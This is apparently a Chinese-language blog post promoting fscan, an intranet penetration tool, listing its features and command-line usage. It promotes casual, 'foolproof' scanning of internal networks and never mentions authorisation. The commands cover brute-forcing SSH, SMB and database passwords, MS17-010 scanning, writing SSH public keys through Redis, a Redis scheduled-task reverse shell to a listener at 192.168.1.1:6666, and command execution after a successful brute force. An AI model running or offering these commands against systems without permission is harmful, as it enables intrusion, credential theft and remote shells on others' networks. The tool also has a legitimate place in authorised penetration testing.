內網滲透大殺器fscan
阿新 • • 發佈:2021-09-07
fscan簡介
一款內網綜合掃描工具,方便一鍵自動化、全方位漏掃掃描。
支援主機存活探測、埠掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計劃任務反彈shell、讀取win網絡卡資訊、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能
主要功能
1.資訊蒐集:
- 存活探測(icmp)
- 埠掃描
2.爆破功能:
- 各類服務爆破(ssh、smb等)
- 資料庫密碼爆破(mysql、mssql、redis、psql等)
3.系統資訊、漏洞掃描:
- netbios探測、域控識別
- 獲取目標網絡卡資訊
- 高危漏洞掃描(ms17010等)
4.Web探測功能:
- webtitle探測
- web指紋識別(常見cms、oa框架等)
- web漏洞掃描(weblogic、st2等,支援xray的poc)
5.漏洞利用:
- redis寫公鑰或寫計劃任務
- ssh命令執行
6.其他功能:
- 檔案儲存
usege
簡單用法
fscan.exe -h 192.168.1.1/24 (預設使用全部模組)
fscan.exe -h 192.168.1.1/16 (B段掃描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不儲存檔案、跳過web poc掃描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功後,命令執行) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模組ssh和埠) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (載入指定檔案的使用者名稱、密碼來進行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果儲存路徑,預設儲存在當前路徑) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速檢視網段資訊 ) fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞) fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模組) fscan.exe -hf ip.txt (以檔案匯入) fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設定http代理 http://127.0.0.1:8080)
牛就完了!
隨便傻瓜式掃一下內網
官方文件以及fscan下載連結 https://github.com/shadow1ng/fscan